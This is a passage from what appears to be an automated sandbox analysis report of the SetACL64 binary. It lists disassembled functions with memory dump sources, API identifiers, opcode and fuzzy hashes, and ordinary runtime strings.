                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
                                        • String ID:
                                        • API String ID: 3702003507-0
                                        • Opcode ID: 626367f9b8e3e811170a77d3899fc771f4540901281f47c30c090418adc7da96
                                        • Instruction ID: 3ac34f992c6dfb38d9f798c207228385878a08602af3722787174c18f00ef7a0
                                        • Opcode Fuzzy Hash: 626367f9b8e3e811170a77d3899fc771f4540901281f47c30c090418adc7da96
                                        • Instruction Fuzzy Hash: 2841C1B1A08A41C1EF059B65E5041BC6365FF45BA4F080239DA9D977D6EF7EEC41C320
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
                                        • String ID:
                                        • API String ID: 3702003507-0
                                        • Opcode ID: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
                                        • Instruction ID: 33b01e2f854d43ca47ac46108accfcf7d7aae661711a8b56741e44fa92e6f5de
                                        • Opcode Fuzzy Hash: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
                                        • Instruction Fuzzy Hash: D8317EE1A4DA42C1EB15DB55E6400B96360FF85B94F18013ADB8D8B795DE6EEC41C320
                                        APIs
                                        • __std_exception_destroy.LIBVCRUNTIME ref: 00007FF68683B638
                                        • __std_exception_destroy.LIBVCRUNTIME ref: 00007FF68683B675
                                          • Part of subcall function 00007FF686862864: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF68683ABCE,?,?,00000000,00007FF6868210A5), ref: 00007FF686862874
                                        Strings
                                        • D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp, xrefs: 00007FF68683B42F
                                        • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 00007FF68683B424
                                        • bad exception, xrefs: 00007FF68683B390
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: __std_exception_destroy$CriticalEnterSection
                                        • String ID: D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp$bad exception$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                        • API String ID: 2585855615-497953542
                                        • Opcode ID: 5cb6a45f1239e3b2c4532f3151a5061be94b55bfe2cba1f0f6b6aad54e40ba79
                                        • Instruction ID: 106f5ca53cb5d389c8e7022223fdb8b5d3cc6107151ed67dd2551436cee5bf1e
                                        • Opcode Fuzzy Hash: 5cb6a45f1239e3b2c4532f3151a5061be94b55bfe2cba1f0f6b6aad54e40ba79
                                        • Instruction Fuzzy Hash: F0B145B2B04B45CAEB10CF65E8401AC73B5FB98B48F04813ACA4D93B68EF39E955C754
                                        APIs
                                        • __std_exception_destroy.LIBVCRUNTIME ref: 00007FF68683B2B8
                                        • __std_exception_destroy.LIBVCRUNTIME ref: 00007FF68683B2F5
                                          • Part of subcall function 00007FF686862864: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF68683ABCE,?,?,00000000,00007FF6868210A5), ref: 00007FF686862874
                                        Strings
                                        • D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp, xrefs: 00007FF68683B0AF
                                        • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 00007FF68683B0A4
                                        • bad allocation, xrefs: 00007FF68683B010
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: __std_exception_destroy$CriticalEnterSection
                                        • String ID: D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp$bad allocation$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                        • API String ID: 2585855615-1037022726
                                        • Opcode ID: 5e9cbe34132cbb56183852d500463e094e47345ad778f8edf29a13b90190a2c1
                                        • Instruction ID: 9459f664edd9e7e572a739e1d3a99a23d5b667f2a596acc72d7804a2ed40a580
                                        • Opcode Fuzzy Hash: 5e9cbe34132cbb56183852d500463e094e47345ad778f8edf29a13b90190a2c1
                                        • Instruction Fuzzy Hash: 3EB146B2B04B41DAEB10CF64E9401AC73B5FF98B48B04813ACA4D97B68EF39E955C754
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: AllocErrorLast
                                        • String ID: tss
                                        • API String ID: 4252645092-1638339373
                                        • Opcode ID: 29b1765d9a66d25320b0dddf9ab890fdc794b5e67b2e205c5b857635990049a4
                                        • Instruction ID: 88d3613bc7585c8887de98f58459499314888efab54541b1c3beafe4da70cd51
                                        • Opcode Fuzzy Hash: 29b1765d9a66d25320b0dddf9ab890fdc794b5e67b2e205c5b857635990049a4
                                        • Instruction Fuzzy Hash: 13215BB5E0DA46C2E6209B24E88507963A0FF99358F600139DBADC26F5DF7EED45C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 731fd435a3bb48197be4118f7954fb208c5f98b7c3500d785dc345691a66c0b5
                                        • Instruction ID: 9be6967095f6ccc3f5d6c80fb5b69760ed24e358599062c8a55ddebee3e71035
                                        • Opcode Fuzzy Hash: 731fd435a3bb48197be4118f7954fb208c5f98b7c3500d785dc345691a66c0b5
                                        • Instruction Fuzzy Hash: DAF0DAA1B19A46C6EF549B60E8843792361BF88B55F44103DE94F85665CF2DD888D730
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        • Opcode ID: 9cd00bc65b5929a6a166b842d15e1553bccd8dfd8d4598a16b21d71fb64958ac
                                        • Instruction ID: e29ff80d028ba8115f939a6473bc579a7a2e8f38b993d5e34dfd4b08ff187404
                                        • Opcode Fuzzy Hash: 9cd00bc65b5929a6a166b842d15e1553bccd8dfd8d4598a16b21d71fb64958ac
                                        • Instruction Fuzzy Hash: 14B1E4A2A2A642C2EA66DF11944C63963A1FF44B84F19843DDF4D87785DF3EEC51C322
                                        APIs
                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF68687E97D
                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF68687E8FB,?,?,?,00007FF686878743), ref: 00007FF68687EA3C
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF68687E8FB,?,?,?,00007FF686878743), ref: 00007FF68687EABC
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2210144848-0
                                        • Opcode ID: 32ec8d574ba77bf2bf9ab58ae09257ebb3ad25bdbe092dfc2be3e9920a5a0306
                                        • Instruction ID: 070281e2bc5e73d69ba095eb7674528a56c955b420c02f18b763ee5959756547
                                        • Opcode Fuzzy Hash: 32ec8d574ba77bf2bf9ab58ae09257ebb3ad25bdbe092dfc2be3e9920a5a0306
                                        • Instruction Fuzzy Hash: 1B81C2A2F18612CAF7509B65A4882BC67B0FF54788F444139DE4EA77A5DE3EAC41C330
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$BufferClientFreeInfo_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1720291354-0
                                        • Opcode ID: 75da794e4bc783c4a2d79550abe500da8be22825966d2fcdd0e41012ba63a114
                                        • Instruction ID: 14f7d1c9ee82a5bdd112fe658efd44f8fe379a48a3946307a06fab59a8a92f03
                                        • Opcode Fuzzy Hash: 75da794e4bc783c4a2d79550abe500da8be22825966d2fcdd0e41012ba63a114
                                        • Instruction Fuzzy Hash: 6661C1E2A18B82C1EA049B19D44836D2761FF85BD4F40413DDB5E876E9DF7ED881C710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _set_statfp
                                        • String ID:
                                        • API String ID: 1156100317-0
                                        • Opcode ID: bd59eed8a6f0dd15b1754f9599e9c4058d21ae63c9d51c95e5ebd76b830cc49a
                                        • Instruction ID: a2af19f878ba62e5a53d3181feb90dd627a63924d593291fcd5949f056915833
                                        • Opcode Fuzzy Hash: bd59eed8a6f0dd15b1754f9599e9c4058d21ae63c9d51c95e5ebd76b830cc49a
                                        • Instruction Fuzzy Hash: 4F51E7A2F1CD46C6F2229B39A8503766270BF94354F04823DE95EA75E4DF3EAC81D720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _set_statfp
                                        • String ID:
                                        • API String ID: 1156100317-0
                                        • Opcode ID: a0e95ead0251a3d4b91f5b95471b4db42acbeaa8104238e2645d395e8be0b7d9
                                        • Instruction ID: 31c0b87ca66f8be3ce1b250dae06e0eabe2ece6216759dbccf6a2873f3c02db9
                                        • Opcode Fuzzy Hash: a0e95ead0251a3d4b91f5b95471b4db42acbeaa8104238e2645d395e8be0b7d9
                                        • Instruction Fuzzy Hash: 8F11B2E2E9CA0385F6641928D9413751143FFA4360E05463CE5BE8A2E7CE2EAC80C234
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Is_bad_exception_allowed
                                        • String ID: csm$csm$csm
                                        • API String ID: 2758241748-393685449
                                        • Opcode ID: a2d6ed14fbf6e40508f258423ea3b56d009d783b16296921d7f948e16fc77ced
                                        • Instruction ID: 31d19d7a33124d0af5e7d560f1747d387a2e960a6c9c2bd73da9c61fcbd081ed
                                        • Opcode Fuzzy Hash: a2d6ed14fbf6e40508f258423ea3b56d009d783b16296921d7f948e16fc77ced
                                        • Instruction Fuzzy Hash: 3EE1B0B2A18682CAE7219F24D4987AD77A0FF44748F100139DF8D97796CF39E885C752
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: gfffffff$gfffffff
                                        • API String ID: 73155330-161084747
                                        • Opcode ID: 65c4fbde1530cd6c047e0c087b113539f9e2fee0312e09cc542a9da4f50b182a
                                        • Instruction ID: c37258a4db801f9480e76afe4d4a1d27fa512c17a07f6dd5a7e26f3afc645736
                                        • Opcode Fuzzy Hash: 65c4fbde1530cd6c047e0c087b113539f9e2fee0312e09cc542a9da4f50b182a
                                        • Instruction Fuzzy Hash: 12A1CCA2A08B89C2DA10CF16E4482A973A4FB98BC4F50823ADF8D87745DF79E595C701
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                        • API String ID: 3215553584-1196891531
                                        • Opcode ID: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
                                        • Instruction ID: 8479071785c1584bc1d57f0a077ad4f29f449b10880987e4c186d243a6ac13f6
                                        • Opcode Fuzzy Hash: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
                                        • Instruction Fuzzy Hash: B08192F2E8C642C6FA654EA9855027826A0FF1AB44F55803DDA4DE72A5CF2FEC01D721
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CallEncodePointerTranslator
                                        • String ID: MOC$RCC
                                        • API String ID: 3544855599-2084237596
                                        • Opcode ID: 42ee9dd8031fa90d2704141954d4b245ff7b62f28e672c949d78bded72fb3b52
                                        • Instruction ID: 8d331ceec3b825c1ed5deca779b2bbaaac8cb1fada0ceb6d5405841f2c0971e9
                                        • Opcode Fuzzy Hash: 42ee9dd8031fa90d2704141954d4b245ff7b62f28e672c949d78bded72fb3b52
                                        • Instruction Fuzzy Hash: A591ADB3A18B81CAE710CB65E8847AC7BA0FB05788F10412AEF8D97755DF39D595C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: $*
                                        • API String ID: 3215553584-3982473090
                                        • Opcode ID: c990fed08c054b4bafabfd0712f02d3fa7d918f2f89bfa53ed27954d69bca4da
                                        • Instruction ID: 07003363c98afa0f5a589a945f7a0319a60298f5640c7d826690c159cf9b1877
                                        • Opcode Fuzzy Hash: c990fed08c054b4bafabfd0712f02d3fa7d918f2f89bfa53ed27954d69bca4da
                                        • Instruction Fuzzy Hash: 616130F2969252CEE7698E28805C17C3BA2FF05B4CF54113ED74E82295CF2ADC61CB60
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                        • String ID: csm$csm
                                        • API String ID: 3896166516-3733052814
                                        • Opcode ID: eecb3a479b2a8091ed75647188cb13960218c4eb8784a86b31c02a998fb32c90
                                        • Instruction ID: 3f51d0ef79901f3ced487147d7f9dcadfffa704688f7f084cc6b19e66824b8cf
                                        • Opcode Fuzzy Hash: eecb3a479b2a8091ed75647188cb13960218c4eb8784a86b31c02a998fb32c90
                                        • Instruction Fuzzy Hash: 5151A1B29286C2C6EB648B51D44876977A0FF44B84F24413DDB9E87B95CF3EE890C712
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: -$e+000$gfff
                                        • API String ID: 3215553584-2620144452
                                        • Opcode ID: b957d2cc3425ec91ce08f74e2f63db020459ef895d73246136ae502abcf24435
                                        • Instruction ID: 87364742c6066b964736586d50243e8fafd6f1fccf2c3da834ce9eb2e8765f2e
                                        • Opcode Fuzzy Hash: b957d2cc3425ec91ce08f74e2f63db020459ef895d73246136ae502abcf24435
                                        • Instruction Fuzzy Hash: AF510CA2B187C186EB258F39984136D7BA1FF41B90F489239D7AC87BD5DE2ED844C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterFileLeaveModuleName_invalid_parameter_noinfo_noreturn
                                        • String ID: .log
                                        • API String ID: 3890993197-299349702
                                        • Opcode ID: d1984f5f7160b112c225d9afbce00dc298177562a86290b7b952876b9305a88a
                                        • Instruction ID: 286d4c6dc4fc32a1175cae0b051a81f96514fd8ec26e54fb25136e2d9fa8eba1
                                        • Opcode Fuzzy Hash: d1984f5f7160b112c225d9afbce00dc298177562a86290b7b952876b9305a88a
                                        • Instruction Fuzzy Hash: BE21D4F1A18642D2EA109B14E94527DA361FF857E0F801639EA6D876E9DF3EEC40CB10
                                        APIs
